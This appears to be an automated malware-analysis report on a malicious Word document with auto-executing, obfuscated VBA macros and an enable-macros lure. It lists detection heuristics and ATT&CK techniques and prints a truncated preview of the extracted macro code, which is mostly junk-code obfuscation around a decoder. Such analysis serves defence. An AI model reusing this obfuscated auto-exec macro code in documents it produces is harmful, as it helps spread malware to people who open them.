Verdict: MALICIOUS
Risk Score: 244
Malware Insights
MITRE ATT&CK
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
- T1140 Deobfuscate/Decode Files or Information
The sample is a malicious Office document containing obfuscated VBA macros. The AutoOpen macro, detected by multiple heuristics, is designed to execute code upon opening. The presence of CreateObject and the detection of obfuscated code suggest the macro is intended to download and execute a second-stage payload, a common technique for malware delivery.
Heuristics (9)
- ClamAV: Doc.Macro.Obfuscated-6397052-2 (critical) [CLAMAV_DETECTION]: ClamAV detected this file as malware: Doc.Macro.Obfuscated-6397052-2
- VBA macros detected (medium, 3 related findings) [OLE_VBA_MACROS]: Document contains VBA macro code
- AutoOpen macro (high) [OLE_VBA_AUTOOPEN]: AutoOpen macro
- CreateObject call (high) [OLE_VBA_CREATEOBJ]: CreateObject call
- VBA p-code auto-exec with execution tokens (high) [OLE_VBA_PCODE_AUTOEXEC_EXEC]: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium) [OLE_LEGACY_WORDBASIC_AUTOEXEC]: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Macro/content-enable lure (medium) [SE_ENABLE_LURE]: Document instructs the user to enable macros or editing, a common technique used by malware droppers to bypass Office macro security settings
- Suspicious extracted artifact (info) [EXTRACTED_FILE_STATIC_TRIAGE]: One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info) [EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://ns.adobe.com/xap/1.0/ (in document text, OLE body)
  - http://www.w3.org/1999/02/22-rdf-syntax-ns# (in document text, OLE body)
  - http://ns.adobe.com/xap/1.0/mm/ (in document text, OLE body)
  - http://ns.adobe.com/xap/1.0/sType/ResourceEvent# (in document text, OLE body)
  - http://ns.adobe.com/photoshop/1.0/ (in document text, OLE body)
  - http://purl.org/dc/elements/1.1/ (in document text, OLE body)
  - http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 86555 bytes |

SHA-256: 6fc883737334c65d0e08214177c98f2e995aae8e2dc548df9999d86ca3846a05

Detection
- ClamAV: No threats found
- Obfuscation or payload: likely (carved artifact contains 2 long base64-like blob(s))

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "BOrcFm"
Public Function jaV8Da7ShLvlFnqN(FDn1sCwz0dsCiQg As String, Optional qSzB3RbZEVvIRBW As Boolean = True) As String
Static mNi7QFlw6oojf7(0 To 255) As Byte
Dim RB9Rgc9blpqUE2 As Object
Dim sUMHumjboQav6y As Object
Dim jlJwnLV7lAU9() As Byte, uevdYX8JPV7uWYP() As Byte
Dim WbKa1MQDwJwVWK As String
Dim hirgQN45CHb As String
hirgQN45CHb = gIcA5pENbd6
WbKa1MQDwJwVWK = eOwPR0rk6mS
If (StrComp(WbKa1MQDwJwVWK, hirgQN45CHb, vbTextCompare) <> 0) Then
MsgBox ("Optional: dA4XqVbMfZC8OE.")
End If
Dim lRxVaB2mDG9tRcWgRF As Long, ERDZBL0lnmniHjs5 As Long
Dim aHQ61K3fW7Se7V As Object
If mNi7QFlw6oojf7(0) = 0 Then
Dim XY6j6HFZW5YDhh As Integer
For lRxVaB2mDG9tRcWgRF = 0 To 255
mNi7QFlw6oojf7(lRxVaB2mDG9tRcWgRF) = 255
Dim R19aKZar39f0PH As Integer
For w1zFeHBCa5j = 5 To 57
R19aKZar39f0PH = w1zFeHBCa5j
Next w1zFeHBCa5j
Next lRxVaB2mDG9tRcWgRF
Dim tezxL96XhuiVkM As Object
Dim XwsiFErZmeMnyG As Integer
For YRHmJgIHhFn = 8 To 86
XwsiFErZmeMnyG = YRHmJgIHhFn
Next YRHmJgIHhFn
For lRxVaB2mDG9tRcWgRF = 0 To 25
Dim WQxFMnc3UbwCSy As Integer
For AnwSBFTAI0Z = 4 To 43
WQxFMnc3UbwCSy = AnwSBFTAI0Z
Next AnwSBFTAI0Z
Dim NiLAqlTWdBK8hN As Integer
Dim t2jBCKUSEBb As String
NiLAqlTWdBK8hN = 9959
Dim tfYY9D8sBJv As Integer
t2jBCKUSEBb = Right(CStr(NiLAqlTWdBK8hN), 1)
tfYY9D8sBJv = CInt(t2jBCKUSEBb)
For LJbSyKzbyNW = tfYY9D8sBJv To 51
NiLAqlTWdBK8hN = NiLAqlTWdBK8hN + 3
Next LJbSyKzbyNW
mNi7QFlw6oojf7(lRxVaB2mDG9tRcWgRF + 65) = lRxVaB2mDG9tRcWgRF
Next lRxVaB2mDG9tRcWgRF
Dim aIYfkldwFGeSta, mJ4XcjCHcrr As String
aIYfkldwFGeSta = 2
mJ4XcjCHcrr = 1
#If aIYfkldwFGeSta > mJ4XcjCHcrr Then
Dim HsQY7spWOug As LongPtr
#Else
Dim HsQY7spWOug As Integer
HsQY7spWOug = 2 + 1
Dim XC5vYX0KNFX As Integer
For XC5vYX0KNFX = 0 To aIYfkldwFGeSta
XC5vYX0KNFX = XC5vYX0KNFX + 1
Next XC5vYX0KNFX
#End If
For lRxVaB2mDG9tRcWgRF = 26 To 51
Dim svOe2L9swYJ3gy As Object
Dim CM3i1FszViQRYZ, CCD3WjKQvw9 As Integer
CM3i1FszViQRYZ = 5
CCD3WjKQvw9 = 4
#If TYNcz7VYrOo <> 0 Then
TYNcz7VYrOo = TYNcz7VYrOo + 6
Dim brkdVALpmRu As Variant
Else
Dim brkdVALpmRu As Object
#End If
If CM3i1FszViQRYZ > CCD3WjKQvw9 Then
For PMWKiI3XwaHier = CCD3WjKQvw9 To CM3i1FszViQRYZ
CCD3WjKQvw9 = CCD3WjKQvw9 / CM3i1FszViQRYZ
Next PMWKiI3XwaHier
End If
Dim kmGAGmZNeUcOZI As String
Dim Fw0pnFrXEHx As String
Fw0pnFrXEHx = syPPpNrV602
kmGAGmZNeUcOZI = eeP5LqZWsJG
If (StrComp(kmGAGmZNeUcOZI, Fw0pnFrXEHx, vbTextCompare) <> 0) Then
MsgBox ("Optional: KMFXecAcUi9LPy.")
End If
mNi7QFlw6oojf7(lRxVaB2mDG9tRcWgRF + 71) = lRxVaB2mDG9tRcWgRF
Dim DuGbV0kgeMFzgY As String
DuGbV0kgeMFzgY = Application.UserName
Dim ai8v3kDak1R, scroJET6oJPJ7Y As Integer
scroJET6oJPJ7Y = Len(DuGbV0kgeMFzgY)
Dim UcaYHqEPRoe As Collection
While scroJET6oJPJ7Y > 9
ai8v3kDak1R = ai8v3kDak1R + 4
scroJET6oJPJ7Y = scroJET6oJPJ7Y - 9
Wend
Dim QzlzKa48Al4uqX, CXVrlzS97hd As Integer
QzlzKa48Al4uqX = 2
CXVrlzS97hd = 9
#If cVt8VLpQ1oF <> 0 Then
cVt8VLpQ1oF = cVt8VLpQ1oF + 6
Dim fSrPMZ4w3Xu As Variant
Else
Dim fSrPMZ4w3Xu As Object
#End If
If QzlzKa48Al4uqX > CXVrlzS97hd Then
For yqLTDD5KT0DTmE = CXVrlzS97hd To QzlzKa48Al4uqX
CXVrlzS97hd = CXVrlzS97hd / QzlzKa48Al4uqX
Next yqLTDD5KT0DTmE
End If
Next lRxVaB2mDG9tRcWgRF
Dim kNE4Lkexy9M2HT As Integer
Dim TvE4BaGkIvP As String
kNE4Lkexy9M2HT = 3279
Dim Y2MmDBvz1BM As Integer
TvE4BaGkIvP = Right(CStr(kNE4Lkexy9M2HT), 1)
Y2MmDBvz1BM = CInt(TvE4BaGkIvP)
For KIftvZ0ZA6k = Y2MmDBvz1BM To 33
kNE4Lkexy9M2HT = kNE4Lkexy9M2HT + 1
Next KIftvZ0ZA6k
For lRxVaB2mDG9tRcWgRF = 52 To 61
Dim qDkWUhV0o4a5oz As Integer
Dim txuCMmOY0uGy63 As String
Dim RXTiBrRXLh3 As String
RXTiBrRXLh3 = UXyDDvYqw09
txuCMmOY0uGy63 = YQGDnM2vYnk
If (StrComp(txuCMmOY0uGy63, RXTiBrRXLh3, vbTextCompare) <> 0) Then
MsgBox ("Optional:
... (truncated)